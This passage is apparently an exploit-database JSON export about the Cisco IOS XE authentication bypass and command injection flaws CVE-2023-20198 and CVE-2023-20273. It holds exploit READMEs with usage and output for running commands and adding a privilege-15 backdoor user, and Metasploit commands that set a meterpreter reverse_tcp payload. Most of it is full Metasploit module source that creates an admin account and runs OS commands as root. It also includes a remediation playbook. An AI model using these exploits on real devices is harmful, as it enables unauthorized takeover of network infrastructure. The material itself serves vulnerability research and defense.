"description": "# CVE-2023-20198-\n\n\nCVE-2023-20198 / 0day - Cisco - Authentication Bypass/RCE\n\n![Screenshot 2023-12-14 013414](https://github.com/codeb0ss/CVE-2023-20198-PoC/assets/135759201/084a2160-318d-4fb6-8048-4e198b494802)\n",
"modified": "2023-12-14T20:23:00",
"id": "351C2762-84D8-562F-877D-B2A6D797418F",
"published": "2023-12-13T22:45:25",
"href": "https://github.com/codeb0ss/CVE-2023-20198-PoC",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/351C2762-84D8-562F-877D-B2A6D797418F"
},
{
"lastseen": "2024-06-05T17:42:37",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198"
],
"description": "# CVE-2023-20198-Fix\n\nThis repository contains an Ansible playbook for remediating the CVE-2023-20198 vulnerability found in certain Cisco devices.\n\nIt does the following:\n1. Checks if the web service is running on the router by checking for the associated commands in the running config\n2. Disables the web service if running\n3. Saves the configuration if changed\n4. Checks the logs for signs of previous exploitation\n\n---\n\n## Directory Structure:\n``` bash\nCVE-2023-20198-Fix/\n\u2502\n\u251c\u2500\u2500 ansible.cfg # Ansible configuration file\n\u251c\u2500\u2500 group_vars/ # Directory for variables specific to groups of hosts\n\u2502 \u2514\u2500\u2500 iosxe_devices.yml # Variable definitions for IOS-XE devices\n\u251c\u2500\u2500 inventory.yml # Inventory of hosts, including devices to target\n\u2514\u2500\u2500 remediate.yml # Playbook for remediating CVE-2023-20198\n```\n\n## Getting Started\n### Prerequisites\nEnsure you have Ansible installed on your control machine. This playbook was written for Ansible 2.9 or newer.\n\n### Setup\nConfigure Ansible:\nEdit ansible.cfg to match your environment settings.\n\n### Inventory:\nUpdate inventory.yml with the host details of your IOS-XE devices. \n\n### Variables:\nDefine any necessary variables in group_vars/iosxe_devices.yml. This should include any common settings for your IOS-XE devices, such as connection settings and credentials.\n\n### Adding Hosts to Inventory\nTo add a new IOS-XE device to the inventory, edit the inventory.yml file and append the new host under the appropriate group:\n\n```yaml\niosxe_devices:\n hosts:\n vulnerable_router01:\n ansible_host: 192.168.1.3\n # ... other necessary variables\n```\n\nReplace new_router01 with your device's hostname and the ansible_* variables with the actual values for your device.\n\n### Updating Group Variables\nIf you need to update credentials or other settings for the group of IOS-XE devices, edit the group_vars/iosxe_devices.yml file:\n\n```yaml\n---\nansible_network_os: ios\nansible_connection: network_cli\nansible_user: admin\nansible_password: admin_password # Lab use only, store credentials responsibly!\nansible_become_method: enable\nansible_become_password: admin_password # Lab use only, store credentials responsibly!\n# ... other variables\n```\n\n\n## Running the Playbook\nTo execute the playbook, use the following command:\n\n```bash\nansible-playbook remediate.yml -i inventory.yml\n```\n\n\n---\n\n## Metasploit verification\n\n### MSF6 Commands\n\n``` bash\nuse exploit/linux/misc/cisco_ios_xe_rce\nset RHOST 192.168.10.242 # Your target IP\nset target 1\nset payload cmd/unix/python/meterpreter/reverse_tcp\ncheck\nexploit\n```\n\n### Pre Remediation check\n\n![Before](/docs/kali_0.PNG)\n\n### Playbook Run\n \n![run](/docs/ansible-playbook_run.PNG)\n\n### Post Remediation check\n\n![Before](/docs/kali_1.PNG)\n\n\n## Testing\nAlways test your changes in a controlled environment before running the playbook in production.\n\n## Security\nStore sensitive data such as passwords and secret keys using Ansible Vault. Do not store plaintext credentials in your inventory or group_vars files.\n\nFor additional security measures and best practices, consult [Ansible's official documentation](https://docs.ansible.com/ansible/latest/index.html).\n\nPlease replace all placeholder values with actual data that corresponds to your environment. This README assumes a basic familiarity with Ansible concepts such as inventory, variables, and running playbooks.",
"modified": "2023-12-08T21:12:00",
"id": "627B1D7A-4832-549F-95BF-B8720698BC95",
"published": "2023-12-08T21:12:00",
"href": "https://github.com/netbell/CVE-2023-20198-Fix",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/627B1D7A-4832-549F-95BF-B8720698BC95"
}
]
Query output for CVE (vulnerability):
[
{
"lastseen": "2024-09-12T13:39:16",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198",
"CVE-2023-20273"
],
"description": "# CVE-2023-20198\nExploit PoC for CVE-2023-20198\n\n## Description\nCVE-2023-20198 is characterized by improper path validation to bypass Nginx filtering to reach the `webui_wsma_http` web endpoint without requiring authentication.<br>\nBy bypassing authentication to the endpoint, an attacker can execute arbitrary Cisco IOS commands or issue configuration changes with Privilege 15 privileges.<br>\nCisco's investigation into active exploitation of the previously undisclosed vulnerability revealed threat actors first exploited CVE-2023-20198 to add a new user with Privilege level 15. Further attacks involved exploitation of CVE-2023-20273 to escalate to the underlying Linux OS `root` user to facilitate implantation.<br> \n\nThis PoC exploits CVE-2023-20198 to leverage two different XML SOAP endpoints:<br>\nThe vulnerability check, config, and command execution options all target the `cisco:wsma-exec` SOAP endpoint to insert commands into the `execCLI` element tag.<br>\nThe add user option targets the `cisco:wsma-config` SOAP endpoint to issue a configuration change and add the Privilege 15 account. This endpoint could be [ab]used to make other configuration changes, but thats outside the scope of this PoC.<br>\n\nAbuse of the `cisco:wsma-exec` SOAP endpoint came from the nuclei template<br>\nAbuse of the `cisco:wsma-config` SOAP endpoint came from the horizon3ai PoC<br>\n\nNote: I did not conduct any of the original research or PoC development for this CVE. See the references section for credit.\n\n## Usage\n```\nusage: exploit.py [-h] (-t targetIP | -l targetFile) [-https] (-c | -g | -e command | -a | -d) [-u newUserName] [-p newUserPass] [-o outputFile] [-v]\n\nCVE-2023-20198 Exploit PoC\n\noptions:\n -h, --help show this help message and exit\n -t targetIP Target IP Address\n -l targetFile File containing IP Addresses (-c only)\n -https Use https\n -c [X] Check for vulnerability\n -g [X] Get Cisco IOS running config\n -e command [X] Execute Cisco IOS command\n -a [X] Add new priv 15 user\n -d [X] Remove priv 15 user\n -u newUserName [Optional] user name for -a or -d. Default: shellsmoke\n -p newUserPass [Optional] new user pass for -a. Default: pwned\n -o outputFile Write output to file\n -v Increase verbosity\n```\n\n### Vulnerability check\nTo check for CVE-2023-20198, `-c` will attempt to exploit the vulnerability to execute `uname -a`<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -c\n\nTesting for vulnerability\nTarget IP: 10.0.0.1\nTarget URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http\nVulnerable: True\nIOS Ver: <REDACTED> IOS 16.6 Cisco IOS Software [Everest], Catalyst L3 Switch Software (CAT3K_CAA-UNIVERSALK9-M), Version 16.6.5, RELEASE SOFTWARE (fc3)\n```\n\n### Get Cisco Config\nThe `-g` option executes `sh run` to pull the running config<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -g\n\nBuilding configuration...\nCurrent configuration : 6988 bytes\n!\n...\n!\nversion 16.6\nno service pad\nservice timestamps debug datetime msec\nservice timestamps log datetime msec\n...\n```\n\n### Execute commands\nArbitrary Cisco IOS commands can be executed with the `-e` option.<br>\nExtreme caution should be used when using this to make configuration changes. There is no input validation and changes are applied immediately to the running config.<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -e 'sh log'\n\nSelected Target: 10.0.0.1\nRunning in Exec Mode\nExecuting Command: sh log\n\nSending exploit to target URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http\n\nSyslog logging: enabled (0 messages dropped, 1 messages rate-limited, 0 flushes, 0 overruns, xml disabled, filtering disabled)\nNo Active Message Discriminator.\nNo Inactive Message Discriminator.\n Console logging: level debugging, 5368 messages logged, xml disabled,\n filtering disabled\n...\n```\n\n### Add user\nThe `-a` option can be used to create a new Privilege 15 user account, optionally specifying the account name and password with `-u` and `-p` respectively.<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -a -u shellsmoke -p pwned\n\nSelected Target: 10.0.0.1\nAdding New Privilege 15 User\nNew User Name: shellsmoke\nNew User Pass: pwned\n\nSending exploit to target URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http\n\nNo reportable output from adding users\nCheck verbose ouput or get running config\nDone.\n```\n\n### Del user\nThe `-d` option can be used to remove a user account from the device, and respects the username specified with `-u`.<br>\nCaution should be used to make sure you aren't deleting a legitimate account.<br>\nThis was added for instances where shell/webui access to an exploited Cisco can not be obtained. It was observed that adding a Privilege 15 user does not grant webui access and could lead to leaving exploitation artifacts on hosts.<br>\n\n## References\n[Cisco Advisory](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z)<br>\n[horizon3ai CVE-2023-20198 research](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/)<br>\n[horizon3ai CVE-2023-20198 PoC](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/)<br>\n[nuclei CVE-2023-20198 template](https://cloud.projectdiscovery.io/public/CVE-2023-20198) (Authors: iamnoooob, rootxharsh, pdresearch)<br>\n[LeakIX CVE-2023-20273 PoC](https://blog.leakix.net/2023/10/cisco-root-privesc/)<br>\n\n## TODO\n- [ ] https support\n- [ ] CVE-2023-20273 Implementation\n- [ ] Timeout and error handling\n\n## Disclaimer\nThe code contained in this project is intended only for research and usage on systems where the user has explicit authorization.<br>\nThe author of this project is not responsible or liable for misuse of the software.<br>\nUse responsibly and don't be evil\n\n",
"modified": "2024-09-12T06:33:33",
"id": "943D5962-14B3-5410-8106-BD5EEA778153",
"published": "2023-11-16T16:39:38",
"href": "https://github.com/smokeintheshell/CVE-2023-20198",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/943D5962-14B3-5410-8106-BD5EEA778153"
},
{
"lastseen": "2024-08-28T00:16:11",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20273",
"CVE-2023-20198"
],
"description": "# CVE-2023-20198\nExploit PoC for CVE-2023-20198\n\n## Description\nCVE-2023-20198 is characterized by improper path validation to bypass Nginx filtering to reach the `webui_wsma_http` web endpoint without requiring authentication.<br>\nBy bypassing authentication to the endpoint, an attacker can execute arbitrary Cisco IOS commands or issue configuration changes with Privilege 15 privileges.<br>\nCisco's investigation into active exploitation of the previously undisclosed vulnerability revealed threat actors first exploited CVE-2023-20198 to add a new user with Privilege level 15. Further attacks involved exploitation of CVE-2023-20273 to escalate to the underlying Linux OS `root` user to facilitate implantation.<br> \n\nThis PoC exploits CVE-2023-20198 to leverage two different XML SOAP endpoints:<br>\nThe vulnerability check, config, and command execution options all target the `cisco:wsma-exec` SOAP endpoint to insert commands into the `execCLI` element tag.<br>\nThe add user option targets the `cisco:wsma-config` SOAP endpoint to issue a configuration change and add the Privilege 15 account. This endpoint could be [ab]used to make other configuration changes, but thats outside the scope of this PoC.<br>\n\nAbuse of the `cisco:wsma-exec` SOAP endpoint came from the nuclei template<br>\nAbuse of the `cisco:wsma-config` SOAP endpoint came from the horizon3ai PoC<br>\n\nNote: I did not conduct any of the original research or PoC development for this CVE. See the references section for credit.\n\n## Usage\n```\nusage: exploit.py [-h] (-t targetIP | -l targetFile) [-https] (-c | -g | -e command | -a | -d) [-u newUserName] [-p newUserPass] [-o outputFile] [-v]\n\nCVE-2023-20198 Exploit PoC\n\noptions:\n -h, --help show this help message and exit\n -t targetIP Target IP Address\n -l targetFile File containing IP Addresses (-c only)\n -https Use https\n -c [X] Check for vulnerability\n -g [X] Get Cisco IOS running config\n -e command [X] Execute Cisco IOS command\n -a [X] Add new priv 15 user\n -d [X] Remove priv 15 user\n -u newUserName [Optional] user name for -a or -d. Default: shellsmoke\n -p newUserPass [Optional] new user pass for -a. Default: pwned\n -o outputFile Write output to file\n -v Increase verbosity\n```\n\n### Vulnerability check\nTo check for CVE-2023-20198, `-c` will attempt to exploit the vulnerability to execute `uname -a`<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -c\n\nTesting for vulnerability\nTarget IP: 10.0.0.1\nTarget URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http\nVulnerable: True\nIOS Ver: <REDACTED> IOS 16.6 Cisco IOS Software [Everest], Catalyst L3 Switch Software (CAT3K_CAA-UNIVERSALK9-M), Version 16.6.5, RELEASE SOFTWARE (fc3)\n```\n\n### Get Cisco Config\nThe `-g` option executes `sh run` to pull the running config<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -g\n\nBuilding configuration...\nCurrent configuration : 6988 bytes\n!\n...\n!\nversion 16.6\nno service pad\nservice timestamps debug datetime msec\nservice timestamps log datetime msec\n...\n```\n\n### Execute commands\nArbitrary Cisco IOS commands can be executed with the `-e` option.<br>\nExtreme caution should be used when using this to make configuration changes. There is no input validation and changes are applied immediately to the running config.<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -e 'sh log'\n\nSelected Target: 10.0.0.1\nRunning in Exec Mode\nExecuting Command: sh log\n\nSending exploit to target URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http\n\nSyslog logging: enabled (0 messages dropped, 1 messages rate-limited, 0 flushes, 0 overruns, xml disabled, filtering disabled)\nNo Active Message Discriminator.\nNo Inactive Message Discriminator.\n Console logging: level debugging, 5368 messages logged, xml disabled,\n filtering disabled\n...\n```\n\n### Add user\nThe `-a` option can be used to create a new Privilege 15 user account, optionally specifying the account name and password with `-u` and `-p` respectively.<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -a -u shellsmoke -p pwned\n\nSelected Target: 10.0.0.1\nAdding New Privilege 15 User\nNew User Name: shellsmoke\nNew User Pass: pwned\n\nSending exploit to target URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http\n\nNo reportable output from adding users\nCheck verbose ouput or get running config\nDone.\n```\n\n### Del user\nThe `-d` option can be used to remove a user account from the device, and respects the username specified with `-u`.<br>\nCaution should be used to make sure you aren't deleting a legitimate account.<br>\nThis was added for instances where shell/webui access to an exploited Cisco can not be obtained. It was observed that adding a Privilege 15 user does not grant webui access and could lead to leaving exploitation artifacts on hosts.<br>\n\n## References\n[Cisco Advisory](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z)<br>\n[horizon3ai CVE-2023-20198 research](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/)<br>\n[horizon3ai CVE-2023-20198 PoC](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/)<br>\n",
"modified": "2024-08-26T08:31:22",
"id": "1C5F3D5A-F5D6-5471-967F-FD50D6649359",
"published": "2024-08-26T08:16:28",
"href": "https://github.com/sanan2004/CVE-2023-20198",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/1C5F3D5A-F5D6-5471-967F-FD50D6649359"
},
{
"lastseen": "2024-09-01T00:05:24",
"description": "",
"published": "2024-08-31T00:00:00",
"type": "packetstorm",
"title": "Cisco IOX XE Unauthenticated OS Command Execution",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198",
"CVE-2023-20273"
],
"modified": "2024-08-31T00:00:00",
"id": "PACKETSTORM:180889",
"href": "https://packetstormsecurity.com/files/180889/Cisco-IOX-XE-Unauthenticated-OS-Command-Execution.html",
"sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Auxiliary \n \ninclude Msf::Exploit::Remote::HTTP::CiscoIosXe \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Retry \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Cisco IOX XE unauthenticated OS command execution', \n'Description' => %q{ \nThis module leverages both CVE-2023-20198 and CVE-2023-20273 against vulnerable instances of Cisco IOS XE \ndevices which have the Web UI exposed. An attacker can execute arbitrary OS commands with root privileges. \n \nThis module leverages CVE-2023-20198 to create a new admin user, then authenticating as this user, \nCVE-2023-20273 is leveraged for OS command injection. The output of the command is written to a file and read \nback via the webserver. Finally the output file is deleted and the admin user is removed. \n \nThe vulnerable IOS XE versions are: \n16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4, \n16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2, \n16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4, \n16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9, \n16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b, \n16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b, \n16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a, \n16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1, \n16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g, \n16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s, \n16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s, \n16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5, \n16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10, \n17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v, \n17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z, \n17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7, \n17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b, \n17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a, \n17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a, \n17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3, \n17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a, \n17.11.99SW \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'sfewer-r7', # MSF module \n], \n'References' => [ \n['CVE', '2023-20198'], \n['CVE', '2023-20273'], \n# Vendor advisories. \n['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z'], \n['URL', 'https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/'], \n# Vendor list of (205) vulnerable versions. \n['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z/cvrf/cisco-sa-iosxe-webui-privesc-j22SaA4z_cvrf.xml'], \n# Technical details on CVE-2023-20198. \n['URL', 'https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/'], \n['URL', 'https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/'], \n# Technical details on CVE-2023-20273. \n['URL', 'https://blog.leakix.net/2023/10/cisco-root-privesc/'] \n], \n'DisclosureDate' => '2023-10-16', \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [], \n'SideEffects' => [IOC_IN_LOGS] \n} \n) \n) \n \nregister_options( \n[ \nOptString.new('CMD', [ true, 'The OS command to execute.', 'id']), \nOptString.new('CISCO_ADMIN_USERNAME', [false, 'The username of an admin account. If not set, CVE-2023-20198 is leveraged to create a new admin account.']), \nOptString.new('CISCO_ADMIN_PASSWORD', [false, 'The password of an admin account. If not set, CVE-2023-20198 is leveraged to create a new admin password.']), \nOptInt.new('REMOVE_OUTPUT_TIMEOUT', [true, 'The maximum timeout (in seconds) to wait when trying to removing the commands output file.', 30]) \n] \n) \nend \n \ndef run \n# If the user has supplied a username/password, we can use these creds to leverage CVE-2023-20273 and execute an OS \n# command. If a username/password have not been supplied, we can leverage CVE-2023-20198 to create a new admin \n# account, and then leverage CVE-2023-20273 to execute an OS command. This opens up the ability to leverage the \n# auxiliary module for CVE-2023-20198 to create a new admin account once, then use those new admin creds in this \n# module to execute multiple OS command without the need to create a new 'temporary' admin account for every \n# invocation of this module (which will reduce the noise in the devices logs). \nif !datastore['CISCO_ADMIN_USERNAME'].blank? && !datastore['CISCO_ADMIN_PASSWORD'].blank? \nexececute_os_command(datastore['CISCO_ADMIN_USERNAME'], datastore['CISCO_ADMIN_PASSWORD']) \nelse \nadmin_username = Rex::Text.rand_text_alpha(8) \nadmin_password = Rex::Text.rand_text_alpha(8) \n \nunless run_cli_command(\"username #{admin_username} privilege 15 secret #{admin_password}\", Mode::GLOBAL_CONFIGURATION) \nprint_error('Failed to create admin user') \nreturn \nend \n \nbegin \nvprint_status(\"Created privilege 15 user '#{admin_username}' with password '#{admin_password}'\") \n \nexececute_os_command(admin_username, admin_password) \nensure \nvprint_status(\"Removing user '#{admin_username}'\") \n \nunless run_cli_command(\"no username #{admin_username}\", Mode::GLOBAL_CONFIGURATION) \nprint_warning('Failed to remove user') \nend \nend \nend \nend \n \ndef exececute_os_command(admin_username, admin_password) \nout_file = Rex::Text.rand_text_alpha(8) \n \ncmd = \"$(openssl enc -base64 -d <<< #{Base64.strict_encode64(datastore['CMD'])}) &> /var/www/#{out_file}\" \n \nunless run_os_command(cmd, admin_username, admin_password) \nprint_error('Failed to run command') \nreturn \nend \n \nbegin \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri('webui', out_file), \n'headers' => { \n'Authorization' => basic_auth(admin_username, admin_password) \n} \n) \n \nunless res&.code == 200 \nprint_error('Failed to get command output') \nreturn \nend \n \nprint_line(res.body) \nensure \nvprint_status(\"Removing output file '/var/www/#{out_file}'\") \n \n# Deleting the output file can take more than one attempt. \nsuccess = retry_until_truthy(timeout: datastore['REMOVE_OUTPUT_TIMEOUT']) do \nif run_os_command(\"rm /var/www/#{out_file}\", admin_username, admin_password) \nnext true \nend \n \nvprint_status('Failed to delete output file, waiting and trying again...') \nfalse \nend \n \nunless success \nprint_error(\"Failed to delete output file '/var/www/#{out_file}\") \nprint_error(out_file) \nend \nend \nend \nend \n`\n",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"sourceHref": "https://packetstormsecurity.com/files/download/180889/cisco_ios_xe_os_exec_cve_2023_20273.rb.txt",
"vhref": "https://vulners.com/packetstorm/PACKETSTORM:180889"
},
{
"lastseen": "2024-08-31T23:08:51",
"description": "",
"published": "2024-08-31T00:00:00",
"type": "packetstorm",
"title": "Cisco IOX XE Unauthenticated Command Line Interface (CLI) Execution",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198"
],
"modified": "2024-08-31T00:00:00",
"id": "PACKETSTORM:180826",
"href": "https://packetstormsecurity.com/files/180826/Cisco-IOX-XE-Unauthenticated-Command-Line-Interface-CLI-Execution.html",
"sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Auxiliary \n \ninclude Msf::Exploit::Remote::HTTP::CiscoIosXe \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Cisco IOX XE unauthenticated Command Line Interface (CLI) execution', \n'Description' => %q{ \nThis module leverages CVE-2023-20198 against vulnerable instances of Cisco IOS XE devices which have the \nWeb UI exposed. An attacker can execute arbitrary CLI commands with privilege level 15. \n \nYou must specify the IOS command mode to execute a CLI command in. Valid modes are `user`, `privileged`, and \n`global`. To run a command in \"Privileged\" mode, set the `CMD` option to the command you want to run, \ne.g. `show version` and set the `MODE` to `privileged`. To run a command in \"Global Configuration\" mode, set \nthe `CMD` option to the command you want to run, e.g. `username hax0r privilege 15 password hax0r` and set \nthe `MODE` to `global`. \n \nThe vulnerable IOS XE versions are: \n16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4, \n16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2, \n16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4, \n16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9, \n16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b, \n16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b, \n16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a, \n16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1, \n16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g, \n16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s, \n16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s, \n16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5, \n16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10, \n17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v, \n17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z, \n17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7, \n17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b, \n17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a, \n17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a, \n17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3, \n17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a, \n17.11.99SW \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'sfewer-r7', # MSF module \n], \n'References' => [ \n['CVE', '2023-20198'], \n# Vendor advisories. \n['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z'], \n['URL', 'https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/'], \n# Vendor list of (205) vulnerable versions. \n['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z/cvrf/cisco-sa-iosxe-webui-privesc-j22SaA4z_cvrf.xml'], \n# Technical details on 